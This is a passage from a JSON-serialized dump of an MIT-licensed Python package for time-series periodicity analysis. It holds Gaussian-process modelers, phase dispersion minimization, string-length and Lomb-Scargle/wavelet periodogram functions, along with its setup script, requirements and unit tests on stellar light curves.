pi)[0][0]\n lags, R = acf(xf, t, maxlag=ml)\n if pi >= 20:\n R = smooth(R, Box1DKernel(width=pi // 10))\n try:\n peaks, heights = find_peaks(R, lags)\n bp_acf = peaks[np.argmax(heights)][0]\n except:\n continue\n ps.append(bp_acf)\n hs.append(np.max(heights))\n tau_max = 20 * pi / bp_acf\n\n def eps(params):\n acf_model = params[0] * np.exp(-lags / params[1]) * np.cos(2 * np.pi * lags / bp_acf)\n return np.sum(np.square(R - acf_model))\n\n results = minimize(fun=eps, x0=np.array([1., bp_acf*2]))\n A, tau = results.x\n tau = min(tau, tau_max)\n ri = eps(results.x)\n qs.append((tau / bp_acf) * (ml * hs[-1] / ri))\n\n return ps, hs, qs\n" }, { "alpha_fraction": 0.5440564751625061, "alphanum_fraction": 0.5624334812164307, "avg_line_length": 34.407535552978516, "blob_id": "88ec9b2cdcf413bf2651c68873ff8dc9c3cd2e44", "content_id": "06162afac4381d2bb6244e455a35bb8a6555279d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10339, "license_type": "permissive", "max_line_length": 117, "num_lines": 292, "path": "/periodicity/gp.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "from autograd import numpy as np\nimport emcee\nfrom scipy.optimize import minimize\nfrom scipy.stats import linregress\nfrom tqdm.auto import tqdm\n\nfrom .acf import gaussian, acf_harmonic_quality\n\n\nclass GPModeler(object):\n \"\"\"Abstract class implementing common functions for a GP Model\"\"\"\n def __init__(self, t, x):\n self.t = np.array(t, float)\n self.x = np.array(x, float)\n\n def uniform_prior(logp):\n window = np.logical_and(self.bounds['log_P'][0] < logp, logp < self.bounds['log_P'][1])\n probs = np.ones_like(logp)\n probs[~window] = 0.0\n return probs\n\n a, b = linregress(self.t, self.x)[:2]\n self.x -= (a * self.t + b)\n\n self.prior = uniform_prior\n self.gp = None\n self.mu = ()\n self.bounds = dict()\n self.sd = ()\n\n def lnlike(self, p):\n 
self.gp.set_parameter_vector(p)\n self.gp.compute(self.t)\n ll = self.gp.log_likelihood(self.x, quiet=True)\n return ll\n\n def lnprior(self, p):\n priors = np.append([gaussian(self.mu[i], self.sd[i]) for i in range(len(self.mu))], [self.prior])\n for i, (lo, hi) in enumerate(self.bounds.values()):\n if not(lo < p[i] < hi):\n return -np.inf\n lp = np.sum(np.log(priors[i](p[i])) for i in range(len(p)))\n return lp\n\n def sample_prior(self, N):\n ndim = len(self.gp)\n samples = np.inf * np.ones((N, ndim))\n m = np.ones(N, dtype=bool)\n nbad = m.sum()\n while nbad > 0:\n r = np.random.randn(N * (ndim - 1)).reshape((N, ndim - 1))\n for i in range(ndim - 1):\n samples[m, i] = r[m, i] * self.sd[i] + self.mu[i]\n samples[m, -1] = self.sample_period(nbad)\n lp = np.array([self.lnprior(p) for p in samples])\n m = ~np.isfinite(lp)\n nbad = m.sum()\n return samples\n\n def sample_period(self, N):\n logP = np.arange(self.bounds['log_P'][0], self.bounds['log_P'][1], .005)\n probs = self.prior(logP)\n probs /= probs.sum()\n periods = np.random.choice(logP.size, N, p=probs)\n samples = logP[periods]\n return samples\n\n def lnprob(self, p):\n self.gp.set_parameter_vector(p)\n lp = self.lnprior(p)\n if not np.isfinite(lp):\n return -np.inf\n return lp + self.lnlike(p)\n\n def nll(self, p, x):\n self.gp.set_parameter_vector(p)\n return -self.gp.log_likelihood(x)\n\n def grad_nll(self, p, x):\n pass\n\n def minimize(self):\n \"\"\"Minimizes negative log-likelihood function within bounds\n\n Returns\n -------\n t: array-like\n 5000 uniform time samples within modeler time array\n mu: array-like\n predicted mean function with maximum likelihood hyperparameters\n sd: array-like\n predicted error at each sample with maximum likelihood hyperparameters\n v: list\n maximum likelihood hyperparameters\n \"\"\"\n assert self.t.size <= 10000, \"Don't forget to decimate before minimizing! 
(N={})\".format(self.t.size)\n self.gp.compute(self.t)\n p0 = self.gp.get_parameter_vector()\n results = minimize(fun=self.nll, x0=p0, args=self.x, method='L-BFGS-B',\n jac=self.grad_nll, bounds=self.bounds.values())\n self.gp.set_parameter_vector(results.x)\n self.gp.compute(self.t)\n t = np.linspace(self.t.min(), self.t.max(), 5000)\n mu, var = self.gp.predict(self.x, self.t, return_var=True)\n sd = np.sqrt(var)\n return t, mu, sd, results.x\n\n def mcmc(self, nwalkers=50, nsteps=1000, burn=0, useprior=False):\n \"\"\"Samples the posterior probability distribution with a Markov Chain Monte Carlo simulation\n\n Parameters\n ----------\n nwalkers: int (optional default=50)\n number of walkers\n nsteps: int (optional default=1000)\n number of steps taken by each walker\n burn: int (optional default=0)\n number of burn-in samples to remove from the beginning of the simulation\n useprior: bool (optional default=False)\n whether to sample from the prior distribution or use a ball centered at the current hyperparameter vector\n\n Returns\n -------\n samples: array-like\n resulting samples of the posterior distribution of the hyperparameters\n \"\"\"\n ndim = len(self.gp)\n sampler = emcee.EnsembleSampler(nwalkers, ndim, self.lnprob)\n # TODO: figure out a way to optimize time complexity by parallel computing\n p = self.gp.get_parameter_vector()\n if useprior:\n p0 = self.sample_prior(nwalkers)\n else:\n p0 = p + 1e-5 * np.random.randn(nwalkers, ndim)\n for _ in tqdm(sampler.sample(p0, iterations=nsteps), total=nsteps):\n pass\n samples = sampler.chain[:, burn:, :].reshape(-1, ndim)\n return samples\n\n\nclass FastGPModeler(GPModeler):\n \"\"\"GP Model based on a sum of exponentials kernel (fast but not so strong)\"\"\"\n def __init__(self, t, x, log_sigma=-17, log_B=-13, log_C=0, log_L=3, log_P=2, bounds=None, sd=None):\n import celerite\n\n class CustomTerm(celerite.terms.Term):\n \"\"\"Custom sum of exponentials kernel\"\"\"\n parameter_names = (\"log_B\", \"log_C\", \"log_L\", \"log_P\")\n\n def get_real_coefficients(self, params):\n log_B, log_C, log_L, log_P = params\n a = np.exp(log_B)\n b = np.exp(log_C)\n c = np.exp(-log_L)\n return a * (1.0 + b) / (2.0 + b), c\n\n def get_complex_coefficients(self, params):\n log_B, log_C, log_L, log_P = params\n a = np.exp(log_B)\n b = np.exp(log_C)\n c = np.exp(-log_L)\n return a / (2.0 + b), 0.0, c, 2 * np.pi * np.exp(-log_P)\n\n super(FastGPModeler, self).__init__(t, x)\n self.mu = (log_sigma, log_B, log_C, log_L)\n if bounds is None:\n bounds = {'log_sigma': (-20, 0), 'log_B': (-20, 0), 'log_C': (-5, 5),\n 'log_L': (1.5, 5.0), 'log_P': (-0.69, 4.61)}\n self.bounds = bounds\n if sd is None:\n sd = (5.0, 5.7, 2.0, 0.7)\n self.sd = sd\n term = celerite.terms.JitterTerm(log_sigma=log_sigma)\n term += CustomTerm(log_B=log_B, log_C=log_C, log_L=log_L, log_P=log_P, bounds=bounds)\n self.gp = celerite.GP(term)\n\n def grad_nll(self, p, x):\n self.gp.set_parameter_vector(p)\n return -self.gp.grad_log_likelihood(x)[1]\n\n\nclass StrongGPModeler(GPModeler):\n \"\"\"GP Model based on Quasi-Periodic kernel (strong but not so fast)\"\"\"\n def __init__(self, t, x, log_sigma=-17, log_A=-13, log_L=5, log_G=1.9, log_P=2, bounds=None, sd=None):\n import george\n\n super(StrongGPModeler, self).__init__(t, x)\n self.mu = (log_sigma, log_A, log_L, log_G)\n if bounds is None:\n bounds = {'log_sigma': (-20, 0), 'log_A': (-20, 0), 'log_L': (2, 8),\n 'log_G': (0, 3), 'log_P': (-0.69, 4.61)}\n self.bounds = bounds\n if sd is None:\n sd = (5.0, 5.7, 1.2, 1.4)\n self.sd = 
sd\n kernel = george.kernels.ConstantKernel(log_A, bounds=[bounds['log_A']])\n kernel *= george.kernels.ExpSquaredKernel(np.exp(log_L), metric_bounds=[bounds['log_L']])\n kernel *= george.kernels.ExpSine2Kernel(log_G, log_P, bounds=[bounds['log_G'], bounds['log_P']])\n self.gp = george.GP(kernel, solver=george.HODLRSolver, white_noise=log_sigma, fit_white_noise=True)\n\n def grad_nll(self, p, x):\n self.gp.set_parameter_vector(p)\n return -self.gp.grad_log_likelihood(x)\n\n\nclass TensorGPModeler(GPModeler):\n \"\"\"GP Model using symbolic computing from PyMC3 and Theano for optimization and enabling GPUs\"\"\"\n def __init__(self, t, x, sigma=4e-8, A=2e-6, L=150, inv_G=-0.6, P=7.5):\n import pymc3 as pm\n\n super(TensorGPModeler, self).__init__(t, x)\n cov = A * pm.gp.cov.ExpQuad(1, L) * pm.gp.cov.Periodic(1, P, inv_G)\n\n raise NotImplementedError\n\n def lnlike(self, p):\n pass\n\n def lnprior(self, p):\n pass\n\n def sample_prior(self, N):\n pass\n\n def sample_period(self, N):\n pass\n\n def lnprob(self, p):\n pass\n\n def nll(self, p, x):\n pass\n\n def grad_nll(self, p, x):\n pass\n\n def minimize(self):\n pass\n\n def mcmc(self, nwalkers=50, nsteps=1000, burn=0, useprior=False):\n pass\n\n\ndef make_gaussian_prior(t, x, pmin=None, periods=None, a=1, b=2, n=8, fundamental_height=0.8, fundamental_width=0.1):\n \"\"\"Generates a weighted sum of Gaussians as a probability prior on the signal period\n\n Based on Angus et al. (2018) MNRAS 474, 2094A\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n input quasi-periodic signal\n pmin: float (optional)\n lower cutoff period to filter signal\n periods: list (optional)\n list of higher cutoff periods to filter signal\n a, b, n: floats (optional)\n if `periods` is not given then it assumes the first `n` powers of `b` scaled by `a`:\n periods = a * b ** np.arange(n)\n defaults are a=1, b=2, n=8\n fundamental_height: float (optional)\n weight of the gaussian mixture on the fundamental peak\n the *2 and /2 harmonics get equal weights (1-fundamental_height)/2\n default=0.8\n fundamental_width: float (optional)\n width of the gaussians in the prior\n default=0.1\n\n Returns\n -------\n gaussian_prior: function\n prior on logP\n \"\"\"\n ps, hs, qs = acf_harmonic_quality(t, x, pmin, periods, a, b, n)\n\n def gaussian_prior(logp):\n tot = 0\n fh = fundamental_height\n hh = (1 - fh) / 2\n fw = fundamental_width\n for pi, qi in zip(ps, qs):\n qi = max(qi, 0)\n gaussian1 = gaussian(np.log(pi), fw)\n gaussian2 = gaussian(np.log(pi / 2), fw)\n gaussian3 = gaussian(np.log(2 * pi), fw)\n tot += qi * (fh * gaussian1(logp) + hh * gaussian2(logp) + hh * gaussian3(logp))\n tot /= np.sum(qs)\n return tot\n\n return gaussian_prior\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7142857313156128, "avg_line_length": 20, "blob_id": "78078baa43345aeb136290a2ac31f323e758e329", "content_id": "a40b71a9c53c4861b942cbae880df6dcb2953699", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 21, "license_type": "permissive", "max_line_length": 20, "num_lines": 1, "path": "/periodicity/__init__.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "name = \"periodicity\"\n" }, { "alpha_fraction": 0.518778383731842, "alphanum_fraction": 0.5511762499809265, "avg_line_length": 31.30666732788086, "blob_id": "6b47311904d2fee10dcfb30817580e48527cf3e4", "content_id": "91bbd56d9a36b85ca391cae6beb61649265fa280", "detected_licenses": [ "MIT" ], 
"is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4846, "license_type": "permissive", "max_line_length": 96, "num_lines": 150, "path": "/periodicity/phase.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom .acf import gaussian, smooth\n\n\ndef stringlength(t, x, dphi=0.1, n_periods=1000, s=0):\n \"\"\"String Length\n (Dworetsky 1983, MNRAS, 203, 917)\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n signal array\n dphi: float (optional default=0.1)\n factor to multiply (1 / baseline) in order to get frequency separation\n n_periods: int (optional default=1000)\n number of trial periods\n s: int (optional)\n standard deviation of Gaussian filter used to smooth, measured in samples\n\n Returns\n -------\n periods: array-like\n trial periods\n ell: array-like\n string length for each period\n \"\"\"\n # scale x to range from -0.25 to +0.25\n x = (x - np.max(x)) / (2 * (np.max(x) - np.min(x))) - 0.25\n df = dphi / (np.max(t) - np.min(t))\n periods = 1 / np.linspace(df, n_periods*df, n_periods)\n periods.sort()\n ell = []\n for period in periods:\n phi = ((t / period) % 1)\n sorted_args = np.argsort(phi)\n phi = phi[sorted_args]\n m = x[sorted_args]\n ll = np.hypot(np.roll(m, -1) - m, np.roll(phi, -1) - phi).sum()\n ell.append(ll)\n # TODO: consider flagging false periods for rejection\n ell = np.array(ell)\n if s > 0:\n kernel = gaussian(mu=0, sd=s)\n h = kernel(np.arange(-(3 * s - 1), 3 * s, 1.))\n ell = smooth(ell, kernel=h)\n return periods, ell\n\n\ndef pdm(t, x, nb=5, nc=2, pmin=.01, pmax=10, n_periods=1000, s=0):\n \"\"\"Phase Dispersion Minimization\n (Stellingwerf 1978, ApJ, 224, 953)\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n signal array\n nb: int (optional default=5)\n number of phase bins\n nc: int (optional default=2)\n number of covers per bin\n pmin, pmax: floats (optional defaults=0.01 and 10)\n minimum/maximum trial period normalized by the baseline\n n_periods: int (optional default=1000)\n number of trial periods\n s: int (optional)\n standard deviation of Gaussian filter used to smooth, measured in samples\n\n Returns\n -------\n periods: array-like\n trial periods\n theta: array-like\n phase dispersion statistic as in Eq. 3 of the paper\n \"\"\"\n t = np.asarray(t)\n x = np.asarray(x)\n sigma = np.var(x, ddof=1)\n t0 = t.max() - t.min()\n theta = []\n periods = np.linspace(pmin*t0, pmax*t0, n_periods)\n m0 = nb * nc\n for period in periods:\n phi = ((t / period) % 1)\n sorted_args = np.argsort(phi)\n phi = phi[sorted_args]\n m = x[sorted_args]\n mj = []\n for k in range(m0):\n mask = phi >= k / m0\n mask &= phi < (k + nc) / m0\n mask |= phi < (k - (m0 - nc)) / m0\n mj.append(m[mask])\n sj = np.array([np.var(k, ddof=1) for k in mj])\n nj = np.array([k.size for k in mj])\n ss = np.sum((nj - 1) * sj)/(np.sum(nj) - m0)\n theta.append(ss/sigma)\n theta = np.array(theta)\n if s > 0:\n kernel = gaussian(mu=0, sd=s)\n h = kernel(np.arange(-(3 * s - 1), 3 * s, 1.))\n theta = smooth(theta, kernel=h)\n return periods, theta\n\n\ndef pdm2(t, x, pmin=None, pmax=None, n_periods=None, s=0, oversample=10, do_subharmonic=False):\n t = np.asarray(t)\n x = np.asarray(x)\n sigma = np.var(x, ddof=1)\n ne = t.size\n assert x.size == ne, \"incompatible array shapes\"\n theta_crit = 1. - 11. 
/ ne ** 0.8\n dt = np.median(np.diff(t))\n t0 = t.max() - t.min()\n thetas = []\n if pmax is None:\n pmax = oversample * t0\n if pmin is None:\n pmin = 2 * dt\n if n_periods is None:\n n_periods = int((1 / pmin - 1 / pmax) * oversample * t0 + 1)\n periods = np.linspace(pmax, pmin, n_periods)\n for period in periods:\n phi = ((t - t[0]) / period) % 1\n masks = np.array([np.logical_and(phi < (b + 1) / 10, phi >= b / 10) for b in range(10)])\n sj = np.array([np.var(x[masks[j]], ddof=1) for j in range(10)])\n nj = masks.sum(axis=1)\n good = nj > 1\n ss = np.sum((nj[good] - 1) * sj[good]) / np.sum(nj[good] - 1)\n theta = ss / sigma\n if do_subharmonic and period <= pmax / 2 and theta < theta_crit:\n sub_index = int((n_periods - 1) * (1 - (2 * period - pmin) / (pmax - pmin)) + 0.5)\n theta = (theta + thetas[sub_index]) / 2\n thetas.append(theta)\n thetas = np.array(thetas)[::-1]\n periods = periods[::-1]\n if s > 0:\n kernel = gaussian(mu=0, sd=s)\n h = kernel(np.arange(-(3 * s - 1), 3 * s, 1.))\n thetas = smooth(thetas, kernel=h)\n return periods, thetas\n\n# TODO: Analysis of Variance (Schwarzenberg-Czerny 1989)\n\n# TODO: Gregory-Loredo method (Gregory & Loredo 1992)\n\n# TODO: conditional entropy method (Graham et al. 2013)\n" }, { "alpha_fraction": 0.6053593158721924, "alphanum_fraction": 0.6224116683006287, "avg_line_length": 31.84000015258789, "blob_id": "b6e5d96713310aae873faf71b486d1acc1843476", "content_id": "dae53a71a0485c6469d076fb8be1c3fa10a75c0d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 821, "license_type": "permissive", "max_line_length": 81, "num_lines": 25, "path": "/setup.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "import setuptools\n\nwith open(\"README.md\", 'r') as f:\n long_description = f.read()\n\nsetuptools.setup(\n name=\"periodicity\",\n version=\"0.1.0b3\",\n author=\"Eduardo Nunes\",\n author_email=\"[email protected]\",\n license=\"MIT\",\n description=\"Useful tools for analysis of periodicities in time series data\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/dioph/periodicity\",\n packages=setuptools.find_packages(),\n install_requires=['numpy>=1.11', 'astropy>=1.3', 'scipy>=0.19.0',\n 'emcee', 'tqdm', 'autograd'],\n classifiers=(\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n \"Intended Audience :: Science/Research\",\n ),\n)\n" }, { "alpha_fraction": 0.6148012280464172, "alphanum_fraction": 0.6223849654197693, "avg_line_length": 30.344263076782227, "blob_id": "b84cf837a1fae0f987cf7c556869cb54d036cecd", "content_id": "2938ff3ef95d2fb92e6e510b499c94626f21975f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3824, "license_type": "permissive", "max_line_length": 97, "num_lines": 122, "path": "/periodicity/periodogram.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom astropy.stats import LombScargle\nfrom wavelets import WaveletAnalysis\n\n\ndef lombscargle(t, x, dx=None, f0=0, fmax=None, n=5, fap_method=None, fap_level=None, psd=False):\n \"\"\"Computes the generalized Lomb-Scargle periodogram of a discrete signal x(t)\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n signal array\n dx: array-like (optional)\n measurement uncertainties for each sample\n f0: float 
(optional default=0)\n minimum frequency\n fmax: float (optional)\n maximum frequency\n If None is given, defaults to the pseudo-Nyquist limit\n n: float (optional default=5)\n samples per peak\n fap_method: string {None, 'baluev', 'bootstrap'}\n the approximation method to use for highest peak FAP and false alarm levels\n None by default\n fap_level: array-like (optional)\n false alarm probabilities to approximate heights\n psd: bool (optional)\n whether to leave periodogram unnormalized (Fourier Spectral Density)\n\n Returns\n -------\n ls: astropy.stats.LombScargle object\n the full object for the given dataset\n f: array-like\n frequency array\n a: array-like\n power array\n fap: float\n false alarm probability of highest peak\n fal: float\n false alarm level for a given FAP\n \"\"\"\n if psd:\n ls = LombScargle(t, x, dy=dx, normalization='psd')\n else:\n ls = LombScargle(t, x, dy=dx)\n if fmax is None:\n T = float(np.median(np.diff(t)))\n fs = 1 / T\n fmax = fs / 2\n f, a = ls.autopower(samples_per_peak=n, minimum_frequency=f0, maximum_frequency=fmax)\n if fap_method is not None:\n assert fap_method in ['baluev', 'bootstrap'], \"Unknown FAP method {}\".format(fap_method)\n fap = ls.false_alarm_probability(a.max(), method=fap_method, minimum_frequency=f0,\n maximum_frequency=fmax, samples_per_peak=n)\n if fap_level is not None:\n fal = ls.false_alarm_level(fap_level, method=fap_method, minimum_frequency=f0,\n maximum_frequency=fmax, samples_per_peak=n)\n return ls, f, a, fap, fal\n return ls, f, a, fap\n return ls, f, a\n\n\ndef window(t, n=5):\n \"\"\"Computes the periodogram of the window function\n\n Parameters\n ----------\n t: array-like\n times of sampling comb window\n n: float (optional default=5)\n samples per peak\n Returns\n -------\n f: array-like\n frequency array\n a : array-like\n power array\n \"\"\"\n ls = LombScargle(t, 1, fit_mean=False, center_data=False)\n f, a = ls.autopower(minimum_frequency=0, samples_per_peak=n)\n return f, a\n\n\ndef wavelet(t, x, pmin=0, pmax=None, n_periods=1000):\n \"\"\"Global Wavelet Power Spectrum using Morlet wavelets\n\n Parameters\n ----------\n t: array-like\n time array\n x: array-like\n signal array\n pmin: float (optional default=0)\n minimum period\n pmax: float (optional default None)\n maximum period; if None is given, uses default scaling\n n_periods: int (optional default=1000)\n number of trial periods\n\n Returns\n -------\n wa: wavelets.WaveletAnalysis object\n the full object for the given dataset\n periods: array-like\n trial periods array\n gwps: array-like\n Global Wavelet Power Spectrum (WPS projected on period axis)\n wps: array-like\n Wavelet Power Spectrum\n \"\"\"\n dt = float(np.median(np.diff(t)))\n wa = WaveletAnalysis(x, t, dt=dt, mask_coi=True, unbias=True)\n periods = wa.fourier_periods\n wps = wa.wavelet_power\n gwps = wa.global_wavelet_spectrum\n return wa, periods, gwps, wps\n\n\n# TODO: check out Supersmoother (Reimann 1994)\n" }, { "alpha_fraction": 0.6419752836227417, "alphanum_fraction": 0.7654321193695068, "avg_line_length": 8, "blob_id": "97383fa96bcdd3d16a462a8b984db62611d7b7aa", "content_id": "4fd2779f86a0171b204d58749ac3657963be989b", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 81, "license_type": "permissive", "max_line_length": 13, "num_lines": 9, "path": "/requirements.txt", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": 
"numpy>=1.11\nastropy>=1.3\nscipy>=0.19.0\nemcee\ntqdm\ngeorge\ncelerite\nautograd\npymc3\n" }, { "alpha_fraction": 0.5946632623672485, "alphanum_fraction": 0.6423125863075256, "avg_line_length": 31.79166603088379, "blob_id": "199e286788d0bb3c333ecf79301720cecd8451ec", "content_id": "a872305ae201293c22d04e4ab8ebf70dc9fa90df", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1574, "license_type": "permissive", "max_line_length": 103, "num_lines": 48, "path": "/periodicity/tests/test_gp.py", "repo_name": "812231487/periodicity", "src_encoding": "UTF-8", "text": "from .. import gp\nfrom astropy.io import ascii\n\nfrom .. import gp\n\nlightcurve1 = ascii.read('periodicity/tests/data/lightcurve1.csv')\nlightcurve2 = ascii.read('periodicity/tests/data/lightcurve2.csv')\n\n\ndef test_file_format_lightcurve1():\n assert lightcurve1.colnames == ['time', 'flux', 'flux_err']\n assert lightcurve1['flux'].size == lightcurve1['time'].size\n assert lightcurve1['time'].size == 2145\n\n\ndef test_file_format_lightcurve2():\n assert lightcurve2.colnames == ['time', 'flux', 'flux_err']\n assert lightcurve2['flux'].size == lightcurve2['time'].size\n assert lightcurve2['time'].size == 2148\n\n\ndef test_make_gaussian_prior1():\n prior = gp.make_gaussian_prior(lightcurve1['time'], lightcurve1['flux'])\n logp = gp.np.linspace(-3, 5, 1000)\n probs = prior(logp)\n assert probs.argmax() == 775\n peaks = [i for i in range(1, len(logp) - 1) if probs[i - 1] < probs[i] and probs[i + 1] < probs[i]]\n assert len(peaks) == 7\n\n\ndef test_make_gaussian_prior2():\n prior = gp.make_gaussian_prior(lightcurve2['time'], lightcurve2['flux'])\n logp = gp.np.linspace(-3, 5, 1000)\n probs = prior(logp)\n assert probs.argmax() == 671\n peaks = [i for i in range(1, len(logp) - 1) if probs[i - 1] < probs[i] and probs[i + 1] < probs[i]]\n assert len(peaks) == 7\n\n\ndef test_class_constructor():\n model = gp.FastGPModeler([1, 2], [3, 4])\n assert model.mu == (-17, -13, 0, 3)\n\n\ndef test_minimize():\n model = gp.FastGPModeler(lightcurve2['time'], lightcurve2['flux'])\n _, _, _, v = model.minimize()\n assert 2.35 < v[4] < 2.37\n" } ]
9
seflaherty/scraping-demo
https://github.com/seflaherty/scraping-demo
0d759f418d397bc6764741abab654f98ce34a149
271cd434190b2dc1a77d7d738f038423162a0b71
5eb88b487b93036804d3466af892d717f0b39913
refs/heads/main
2023-08-18T16:41:45.943785
2021-10-18T12:40:03
2021-10-18T12:40:52
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6584158539772034, "alphanum_fraction": 0.6732673048973083, "avg_line_length": 24.25, "blob_id": "1dd40e4c574032b5a38d6339c285a6139d8eb787", "content_id": "327868b228d6bc2adfcd92daca95ac7a7b60f82c", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 202, "license_type": "permissive", "max_line_length": 40, "num_lines": 8, "path": "/sql_files/create.sql", "repo_name": "seflaherty/scraping-demo", "src_encoding": "UTF-8", "text": "-- Uncomment when db doesn't exist\n-- CREATE DATABASE exploitdb\n-- ENCODING 'UTF8';\n--\n-- CREATE TABLE IF NOT EXISTS exploits (\n-- \tid integer primary key,\n-- \texploit_id VARCHAR(60),\n-- \tcves TEXT);\n" }, { "alpha_fraction": 0.533544659614563, "alphanum_fraction": 0.5393555164337158, "avg_line_length": 36.117645263671875, "blob_id": "d7d937144a63c4d16b3056eebcab461a70f3d192", "content_id": "3abba30fd6bf059865645f6e8ede160848cc3a6a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1893, "license_type": "permissive", "max_line_length": 93, "num_lines": 51, "path": "/cve/cve/spiders/exploit.py", "repo_name": "seflaherty/scraping-demo", "src_encoding": "UTF-8", "text": "import scrapy\nimport os\nfrom os.path import dirname\n\ncurrent_dir = os.path.dirname(__file__)\nurl = os.path.join(current_dir, 'source-EXPLOIT-DB.html')\ntop_dir = dirname(dirname(dirname(current_dir)))\nsql_file = os.path.join(top_dir, 'sql_files/populate.sql')\n\nclass ExploitSpider(scrapy.Spider):\n name = 'exploit'\n allowed_domains = ['cve.mitre.org']\n # Starting with actual URLs is fine\n #start_urls = ['http://cve.mitre.org/data/refs/refmap/source-EXPLOIT-DB.html']\n # But you can use files as well!\n start_urls = [f\"file://{url}\"]\n\n def parse(self, response):\n table = None\n count = 0\n for child in response.xpath('//table'):\n if len(child.xpath('tr')) > 100:\n table = child\n for row in table.xpath('//tr'):\n if count > 100:\n break\n cve_list = []\n try:\n # This captures 1 CVE only, but you may have many\n exploit_id = row.xpath('td//text()')[0].extract()\n cve_id = row.xpath('td//text()')[2].extract()\n print(f\"exploit id: {exploit_id} -> {cve_id}\")\n append_sql_file(exploit_id, cve_id)\n# # This is one way of doing that\n# for text in row.xpath('td//text()'):\n# if text.extract().startswith('CVE'):\n# cve_list.append(text.extract())\n# print(f\"exploit id: {exploit_id} -> {cve_list}\")\n except Exception as err:\n print(f\"skipping due to: {err}\")\n count += 1\n\n\ndef append_sql_file(exploit_id, cves):\n line = f\"INSERT INTO exploit(exploit_id, cves) VALUES ('{exploit_id}', '{str(cves)}');\\n\"\n if not os.path.exists(sql_file):\n with open(sql_file, 'w') as _f:\n _f.write(line)\n return\n with open(sql_file, 'a') as _f:\n _f.write(line)\n" }, { "alpha_fraction": 0.7063291072845459, "alphanum_fraction": 0.7174050807952881, "avg_line_length": 45.131385803222656, "blob_id": "6d88d1d579cf75bbedffe6992852064e43406dbb", "content_id": "6bde9219af43d5f547377080fb0f7d6f598da832", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6322, "license_type": "permissive", "max_line_length": 472, "num_lines": 137, "path": "/README.md", "repo_name": "seflaherty/scraping-demo", "src_encoding": "UTF-8", "text": "# scraping-demo\nDemo for scraping using scrapy, parsing a real website, extracting key information that is not available through an API and using SQL to query it 
later.\n\nInstall _requirements.txt_ in a virtual environment\n\n```\n$ python3 -m venv venv\n$ source venv/bin/activate\n$ pip install -r requirements.txt\n```\n\nGet started with scrapy: https://docs.scrapy.org/en/latest/intro/tutorial.html\n\n```\n$ scrapy startproject cve\n$ scrapy genspider exploit cve.mitre.org\n```\n\nUse XPath or the CSS module to find nodes. XPath is a query language for finding and selecting nodes in an XML document that is also useful for HTML.\n\n```\n$ scrapy shell http://cve.mitre.org/data/refs/refmap/source-EXPLOIT-DB.html\n>>> response.url\n'http://cve.mitre.org/data/refs/refmap/source-EXPLOIT-DB.html'\n>>> response.css\n<bound method TextResponse.css of <200 http://cve.mitre.org/data/refs/refmap/source-EXPLOIT-DB.html>>\n>>> response.xpath('//table')\n[<Selector xpath='//table' data='<table style=\"width:100%;border-colla...'>, <Selector xpath='//table' data='<table style=\"text-align:right\"><tr><...'>, <Selector xpath='//table' data='<table cellpadding=\"2\" cellspacing=\"2...'>, <Selector xpath='//table' data='<table cellpadding=\"2\" cellspacing=\"2...'>, <Selector xpath='//table' data='<table>\\n <tr>\\n ...'>]\n>>> len(response.xpath('//table'))\n5\n>>> response.css('table')\n[<Selector xpath='descendant-or-self::table' data='<table style=\"width:100%;border-colla...'>, <Selector xpath='descendant-or-self::table' data='<table style=\"text-align:right\"><tr><...'>, <Selector xpath='descendant-or-self::table' data='<table cellpadding=\"2\" cellspacing=\"2...'>, <Selector xpath='descendant-or-self::table' data='<table cellpadding=\"2\" cellspacing=\"2...'>, <Selector xpath='descendant-or-self::table' data='<table>\\n <tr>\\n ...'>]\n>>> len(response.css('table'))\n5\n```\n\nFind the biggest table:\n\n```\n>>> for table in response.css('table'):\n...     if len(table.xpath('tr')) >10:\n...         print(table)\n```\n\nOr:\n\n```\n>>> len(response.css('table'))\n5\n>>> len(response.xpath('//table'))\n5\n>>> len(response.css('table')[0].xpath('tr'))\n3\n>>> len(response.css('table')[1].xpath('tr'))\n3\n>>> len(response.css('table')[2].xpath('tr'))\n4\n>>> len(response.css('table')[3].xpath('tr'))\n10839\n\n```\n\nNone of these tables have any method of identification so you are forced to look into each table to see if there are enough elements that can signal the table we are interested in, the one that holds several thousand rows.\n\n```\n>>> row = data[0]\n>>> print(row.getall()[0])\n<tr>\n<td>EXPLOIT-DB:10102</td>\n<td> <a href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4186\">CVE-2009-4186</a>\n</td>\n</tr>\n```\n\nGet the value of href using xpath:\n\n```\n>>> row.xpath('td//a/@href')[0].extract()\n'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4186'\n```\n\nThere is no need for the href though because all 